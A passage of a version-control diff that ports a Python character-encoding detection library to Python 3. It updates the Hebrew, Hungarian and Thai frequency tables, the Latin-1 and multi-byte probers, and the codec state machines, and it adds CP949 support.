@ -55,13 +53,13 @@ win1255_CharToOrderMap = ( \
12, 19, 13, 26, 18, 27, 21, 17, 7, 10, 5,251,252,128, 96,253,
)
# Model Table:
# Model Table:
# total sequences: 100%
# first 512 sequences: 98.4004%
# first 1024 sequences: 1.5981%
# rest sequences: 0.087%
# negative sequences: 0.0015%
HebrewLangModel = ( \
# negative sequences: 0.0015%
HebrewLangModel = (
0,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,3,2,1,2,0,1,0,0,
3,0,3,1,0,0,1,3,2,0,1,1,2,0,2,2,2,1,1,1,1,2,1,1,1,2,0,0,2,2,0,1,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,
@ -192,10 +190,12 @@ HebrewLangModel = ( \
0,0,0,0,0,0,0,0,0,0,1,2,1,0,0,0,0,0,1,1,1,1,1,0,1,0,0,0,1,1,0,0,
)
Win1255HebrewModel = { \
Win1255HebrewModel = {
'charToOrderMap': win1255_CharToOrderMap,
'precedenceMatrix': HebrewLangModel,
'mTypicalPositiveRatio': 0.984004,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "windows-1255"
}
# flake8: noqa

View File

@ -13,27 +13,25 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# Character Mapping Table:
Latin2_HungarianCharToOrderMap = ( \
Latin2_HungarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -52,7 +50,7 @@ Latin2_HungarianCharToOrderMap = ( \
245,246,247, 25, 73, 42, 24,248,249,250, 31, 56, 29,251,252,253,
)
win1250HungarianCharToOrderMap = ( \
win1250HungarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -71,13 +69,13 @@ win1250HungarianCharToOrderMap = ( \
245,246,247, 25, 74, 42, 24,248,249,250, 31, 56, 29,251,252,253,
)
# Model Table:
# Model Table:
# total sequences: 100%
# first 512 sequences: 94.7368%
# first 1024 sequences:5.2623%
# rest sequences: 0.8894%
# negative sequences: 0.0009%
HungarianLangModel = ( \
# negative sequences: 0.0009%
HungarianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,
3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,2,3,3,1,1,2,2,2,2,2,1,2,
3,2,2,3,3,3,3,3,2,3,3,3,3,3,3,1,2,3,3,3,3,2,3,3,1,1,3,3,0,1,1,1,
@ -208,18 +206,20 @@ HungarianLangModel = ( \
0,1,1,1,1,1,1,0,1,1,0,1,0,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,
)
Latin2HungarianModel = { \
Latin2HungarianModel = {
'charToOrderMap': Latin2_HungarianCharToOrderMap,
'precedenceMatrix': HungarianLangModel,
'mTypicalPositiveRatio': 0.947368,
'keepEnglishLetter': constants.True,
'keepEnglishLetter': True,
'charsetName': "ISO-8859-2"
}
Win1250HungarianModel = { \
Win1250HungarianModel = {
'charToOrderMap': win1250HungarianCharToOrderMap,
'precedenceMatrix': HungarianLangModel,
'mTypicalPositiveRatio': 0.947368,
'keepEnglishLetter': constants.True,
'keepEnglishLetter': True,
'charsetName': "windows-1250"
}
# flake8: noqa

View File

@ -13,29 +13,27 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# The following result for thai was collected from a limited sample (1M).
# The following result for thai was collected from a limited sample (1M).
# Character Mapping Table:
TIS620CharToOrderMap = ( \
TIS620CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -54,13 +52,13 @@ TIS620CharToOrderMap = ( \
68, 56, 59, 65, 69, 60, 70, 80, 71, 87,248,249,250,251,252,253,
)
# Model Table:
# Model Table:
# total sequences: 100%
# first 512 sequences: 92.6386%
# first 1024 sequences:7.3177%
# rest sequences: 1.0230%
# negative sequences: 0.0436%
ThaiLangModel = ( \
# negative sequences: 0.0436%
ThaiLangModel = (
0,1,3,3,3,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,0,0,3,3,3,0,3,3,3,3,
0,3,3,0,0,0,1,3,0,3,3,2,3,3,0,1,2,3,3,3,3,0,2,0,2,0,0,3,2,1,2,2,
3,0,3,3,2,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,0,3,2,3,0,2,2,2,3,
@ -191,10 +189,12 @@ ThaiLangModel = ( \
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
)
TIS620ThaiModel = { \
TIS620ThaiModel = {
'charToOrderMap': TIS620CharToOrderMap,
'precedenceMatrix': ThaiLangModel,
'mTypicalPositiveRatio': 0.926386,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "TIS-620"
}
# flake8: noqa

View File

@ -14,85 +14,86 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from charsetprober import CharSetProber
import constants
import operator
from .charsetprober import CharSetProber
from .constants import eNotMe
from .compat import wrap_ord
FREQ_CAT_NUM = 4
UDF = 0 # undefined
OTH = 1 # other
ASC = 2 # ascii capital letter
ASS = 3 # ascii small letter
ACV = 4 # accent capital vowel
ACO = 5 # accent capital other
ASV = 6 # accent small vowel
ASO = 7 # accent small other
CLASS_NUM = 8 # total classes
UDF = 0 # undefined
OTH = 1 # other
ASC = 2 # ascii capital letter
ASS = 3 # ascii small letter
ACV = 4 # accent capital vowel
ACO = 5 # accent capital other
ASV = 6 # accent small vowel
ASO = 7 # accent small other
CLASS_NUM = 8 # total classes
Latin1_CharToClass = ( \
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 00 - 07
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 08 - 0F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 10 - 17
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 18 - 1F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 20 - 27
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 28 - 2F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 30 - 37
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 38 - 3F
OTH, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 40 - 47
ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 48 - 4F
ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 50 - 57
ASC, ASC, ASC, OTH, OTH, OTH, OTH, OTH, # 58 - 5F
OTH, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 60 - 67
ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 68 - 6F
ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 70 - 77
ASS, ASS, ASS, OTH, OTH, OTH, OTH, OTH, # 78 - 7F
OTH, UDF, OTH, ASO, OTH, OTH, OTH, OTH, # 80 - 87
OTH, OTH, ACO, OTH, ACO, UDF, ACO, UDF, # 88 - 8F
UDF, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 90 - 97
OTH, OTH, ASO, OTH, ASO, UDF, ASO, ACO, # 98 - 9F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A0 - A7
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A8 - AF
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B0 - B7
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B8 - BF
ACV, ACV, ACV, ACV, ACV, ACV, ACO, ACO, # C0 - C7
ACV, ACV, ACV, ACV, ACV, ACV, ACV, ACV, # C8 - CF
ACO, ACO, ACV, ACV, ACV, ACV, ACV, OTH, # D0 - D7
ACV, ACV, ACV, ACV, ACV, ACO, ACO, ACO, # D8 - DF
ASV, ASV, ASV, ASV, ASV, ASV, ASO, ASO, # E0 - E7
ASV, ASV, ASV, ASV, ASV, ASV, ASV, ASV, # E8 - EF
ASO, ASO, ASV, ASV, ASV, ASV, ASV, OTH, # F0 - F7
ASV, ASV, ASV, ASV, ASV, ASO, ASO, ASO, # F8 - FF
Latin1_CharToClass = (
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 00 - 07
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 08 - 0F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 10 - 17
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 18 - 1F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 20 - 27
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 28 - 2F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 30 - 37
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 38 - 3F
OTH, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 40 - 47
ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 48 - 4F
ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 50 - 57
ASC, ASC, ASC, OTH, OTH, OTH, OTH, OTH, # 58 - 5F
OTH, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 60 - 67
ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 68 - 6F
ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 70 - 77
ASS, ASS, ASS, OTH, OTH, OTH, OTH, OTH, # 78 - 7F
OTH, UDF, OTH, ASO, OTH, OTH, OTH, OTH, # 80 - 87
OTH, OTH, ACO, OTH, ACO, UDF, ACO, UDF, # 88 - 8F
UDF, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 90 - 97
OTH, OTH, ASO, OTH, ASO, UDF, ASO, ACO, # 98 - 9F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A0 - A7
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A8 - AF
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B0 - B7
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B8 - BF
ACV, ACV, ACV, ACV, ACV, ACV, ACO, ACO, # C0 - C7
ACV, ACV, ACV, ACV, ACV, ACV, ACV, ACV, # C8 - CF
ACO, ACO, ACV, ACV, ACV, ACV, ACV, OTH, # D0 - D7
ACV, ACV, ACV, ACV, ACV, ACO, ACO, ACO, # D8 - DF
ASV, ASV, ASV, ASV, ASV, ASV, ASO, ASO, # E0 - E7
ASV, ASV, ASV, ASV, ASV, ASV, ASV, ASV, # E8 - EF
ASO, ASO, ASV, ASV, ASV, ASV, ASV, OTH, # F0 - F7
ASV, ASV, ASV, ASV, ASV, ASO, ASO, ASO, # F8 - FF
)
# 0 : illegal
# 1 : very unlikely
# 2 : normal
# 0 : illegal
# 1 : very unlikely
# 2 : normal
# 3 : very likely
Latin1ClassModel = ( \
# UDF OTH ASC ASS ACV ACO ASV ASO
0, 0, 0, 0, 0, 0, 0, 0, # UDF
0, 3, 3, 3, 3, 3, 3, 3, # OTH
0, 3, 3, 3, 3, 3, 3, 3, # ASC
0, 3, 3, 3, 1, 1, 3, 3, # ASS
0, 3, 3, 3, 1, 2, 1, 2, # ACV
0, 3, 3, 3, 3, 3, 3, 3, # ACO
0, 3, 1, 3, 1, 1, 1, 3, # ASV
0, 3, 1, 3, 1, 1, 3, 3, # ASO
Latin1ClassModel = (
# UDF OTH ASC ASS ACV ACO ASV ASO
0, 0, 0, 0, 0, 0, 0, 0, # UDF
0, 3, 3, 3, 3, 3, 3, 3, # OTH
0, 3, 3, 3, 3, 3, 3, 3, # ASC
0, 3, 3, 3, 1, 1, 3, 3, # ASS
0, 3, 3, 3, 1, 2, 1, 2, # ACV
0, 3, 3, 3, 3, 3, 3, 3, # ACO
0, 3, 1, 3, 1, 1, 1, 3, # ASV
0, 3, 1, 3, 1, 1, 3, 3, # ASO
)
class Latin1Prober(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
@ -109,10 +110,11 @@ class Latin1Prober(CharSetProber):
def feed(self, aBuf):
aBuf = self.filter_with_english_letters(aBuf)
for c in aBuf:
charClass = Latin1_CharToClass[ord(c)]
freq = Latin1ClassModel[(self._mLastCharClass * CLASS_NUM) + charClass]
charClass = Latin1_CharToClass[wrap_ord(c)]
freq = Latin1ClassModel[(self._mLastCharClass * CLASS_NUM)
+ charClass]
if freq == 0:
self._mState = constants.eNotMe
self._mState = eNotMe
break
self._mFreqCounter[freq] += 1
self._mLastCharClass = charClass
@ -120,17 +122,18 @@ class Latin1Prober(CharSetProber):
return self.get_state()
def get_confidence(self):
if self.get_state() == constants.eNotMe:
if self.get_state() == eNotMe:
return 0.01
total = reduce(operator.add, self._mFreqCounter)
total = sum(self._mFreqCounter)
if total < 0.01:
confidence = 0.0
else:
confidence = (self._mFreqCounter[3] / total) - (self._mFreqCounter[1] * 20.0 / total)
confidence = ((self._mFreqCounter[3] - self._mFreqCounter[1] * 20.0)
/ total)
if confidence < 0.0:
confidence = 0.0
# lower the confidence of latin1 so that other more accurate detector
# can take priority.
confidence = confidence * 0.5
# lower the confidence of latin1 so that other more accurate
# detector can take priority.
confidence = confidence * 0.73
return confidence

View File

@ -15,28 +15,29 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from constants import eStart, eError, eItsMe
from charsetprober import CharSetProber
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mDistributionAnalyzer = None
self._mCodingSM = None
self._mLastChar = ['\x00', '\x00']
self._mLastChar = [0, 0]
def reset(self):
CharSetProber.reset(self)
@ -44,7 +45,7 @@ class MultiByteCharSetProber(CharSetProber):
self._mCodingSM.reset()
if self._mDistributionAnalyzer:
self._mDistributionAnalyzer.reset()
self._mLastChar = ['\x00', '\x00']
self._mLastChar = [0, 0]
def get_charset_name(self):
pass
@ -53,27 +54,30 @@ class MultiByteCharSetProber(CharSetProber):
aLen = len(aBuf)
for i in xrange(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == eError:
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n')
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == eItsMe:
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == eStart:
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mDistributionAnalyzer.feed(aBuf[i-1:i+1], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if self._mDistributionAnalyzer.got_enough_data() and \
(self.get_confidence() > constants.SHORTCUT_THRESHOLD):
if (self._mDistributionAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()

View File

@ -15,36 +15,40 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from charsetgroupprober import CharSetGroupProber
from utf8prober import UTF8Prober
from sjisprober import SJISProber
from eucjpprober import EUCJPProber
from gb2312prober import GB2312Prober
from euckrprober import EUCKRProber
from big5prober import Big5Prober
from euctwprober import EUCTWProber
from .charsetgroupprober import CharSetGroupProber
from .utf8prober import UTF8Prober
from .sjisprober import SJISProber
from .eucjpprober import EUCJPProber
from .gb2312prober import GB2312Prober
from .euckrprober import EUCKRProber
from .cp949prober import CP949Prober
from .big5prober import Big5Prober
from .euctwprober import EUCTWProber
class MBCSGroupProber(CharSetGroupProber):
def __init__(self):
CharSetGroupProber.__init__(self)
self._mProbers = [ \
self._mProbers = [
UTF8Prober(),
SJISProber(),
EUCJPProber(),
GB2312Prober(),
EUCKRProber(),
CP949Prober(),
Big5Prober(),
EUCTWProber()]
EUCTWProber()
]
self.reset()

View File

@ -13,60 +13,62 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from constants import eStart, eError, eItsMe
from .constants import eStart, eError, eItsMe
# BIG5
# BIG5
BIG5_cls = ( \
BIG5_cls = (
1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as legal value
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
4,4,4,4,4,4,4,4, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
4,3,3,3,3,3,3,3, # a0 - a7
3,3,3,3,3,3,3,3, # a8 - af
3,3,3,3,3,3,3,3, # b0 - b7
3,3,3,3,3,3,3,3, # b8 - bf
3,3,3,3,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0) # f8 - ff
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
4,4,4,4,4,4,4,4, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
4,3,3,3,3,3,3,3, # a0 - a7
3,3,3,3,3,3,3,3, # a8 - af
3,3,3,3,3,3,3,3, # b0 - b7
3,3,3,3,3,3,3,3, # b8 - bf
3,3,3,3,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0 # f8 - ff
)
BIG5_st = ( \
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f
eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart)#10-17
BIG5_st = (
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f
eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart#10-17
)
Big5CharLenTable = (0, 1, 1, 2, 0)
@ -76,48 +78,90 @@ Big5SMModel = {'classTable': BIG5_cls,
'charLenTable': Big5CharLenTable,
'name': 'Big5'}
# CP949
CP949_cls = (
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,0,0, # 00 - 0f
1,1,1,1,1,1,1,1, 1,1,1,0,1,1,1,1, # 10 - 1f
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 20 - 2f
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 30 - 3f
1,4,4,4,4,4,4,4, 4,4,4,4,4,4,4,4, # 40 - 4f
4,4,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 50 - 5f
1,5,5,5,5,5,5,5, 5,5,5,5,5,5,5,5, # 60 - 6f
5,5,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 70 - 7f
0,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 80 - 8f
6,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 90 - 9f
6,7,7,7,7,7,7,7, 7,7,7,7,7,8,8,8, # a0 - af
7,7,7,7,7,7,7,7, 7,7,7,7,7,7,7,7, # b0 - bf
7,7,7,7,7,7,9,2, 2,3,2,2,2,2,2,2, # c0 - cf
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # d0 - df
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # e0 - ef
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,0, # f0 - ff
)
CP949_st = (
#cls= 0 1 2 3 4 5 6 7 8 9 # previous state =
eError,eStart, 3,eError,eStart,eStart, 4, 5,eError, 6, # eStart
eError,eError,eError,eError,eError,eError,eError,eError,eError,eError, # eError
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe, # eItsMe
eError,eError,eStart,eStart,eError,eError,eError,eStart,eStart,eStart, # 3
eError,eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 4
eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 5
eError,eStart,eStart,eStart,eStart,eError,eError,eStart,eStart,eStart, # 6
)
CP949CharLenTable = (0, 1, 2, 0, 1, 1, 2, 2, 0, 2)
CP949SMModel = {'classTable': CP949_cls,
'classFactor': 10,
'stateTable': CP949_st,
'charLenTable': CP949CharLenTable,
'name': 'CP949'}
# EUC-JP
EUCJP_cls = ( \
4,4,4,4,4,4,4,4, # 00 - 07
4,4,4,4,4,4,5,5, # 08 - 0f
4,4,4,4,4,4,4,4, # 10 - 17
4,4,4,5,4,4,4,4, # 18 - 1f
4,4,4,4,4,4,4,4, # 20 - 27
4,4,4,4,4,4,4,4, # 28 - 2f
4,4,4,4,4,4,4,4, # 30 - 37
4,4,4,4,4,4,4,4, # 38 - 3f
4,4,4,4,4,4,4,4, # 40 - 47
4,4,4,4,4,4,4,4, # 48 - 4f
4,4,4,4,4,4,4,4, # 50 - 57
4,4,4,4,4,4,4,4, # 58 - 5f
4,4,4,4,4,4,4,4, # 60 - 67
4,4,4,4,4,4,4,4, # 68 - 6f
4,4,4,4,4,4,4,4, # 70 - 77
4,4,4,4,4,4,4,4, # 78 - 7f
5,5,5,5,5,5,5,5, # 80 - 87
5,5,5,5,5,5,1,3, # 88 - 8f
5,5,5,5,5,5,5,5, # 90 - 97
5,5,5,5,5,5,5,5, # 98 - 9f
5,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,0,5) # f8 - ff
EUCJP_cls = (
4,4,4,4,4,4,4,4, # 00 - 07
4,4,4,4,4,4,5,5, # 08 - 0f
4,4,4,4,4,4,4,4, # 10 - 17
4,4,4,5,4,4,4,4, # 18 - 1f
4,4,4,4,4,4,4,4, # 20 - 27
4,4,4,4,4,4,4,4, # 28 - 2f
4,4,4,4,4,4,4,4, # 30 - 37
4,4,4,4,4,4,4,4, # 38 - 3f
4,4,4,4,4,4,4,4, # 40 - 47
4,4,4,4,4,4,4,4, # 48 - 4f
4,4,4,4,4,4,4,4, # 50 - 57
4,4,4,4,4,4,4,4, # 58 - 5f
4,4,4,4,4,4,4,4, # 60 - 67
4,4,4,4,4,4,4,4, # 68 - 6f
4,4,4,4,4,4,4,4, # 70 - 77
4,4,4,4,4,4,4,4, # 78 - 7f
5,5,5,5,5,5,5,5, # 80 - 87
5,5,5,5,5,5,1,3, # 88 - 8f
5,5,5,5,5,5,5,5, # 90 - 97
5,5,5,5,5,5,5,5, # 98 - 9f
5,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,0,5 # f8 - ff
)
EUCJP_st = ( \
3, 4, 3, 5,eStart,eError,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17
eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f
3,eError,eError,eError,eStart,eStart,eStart,eStart)#20-27
EUCJP_st = (
3, 4, 3, 5,eStart,eError,eError,eError,#00-07
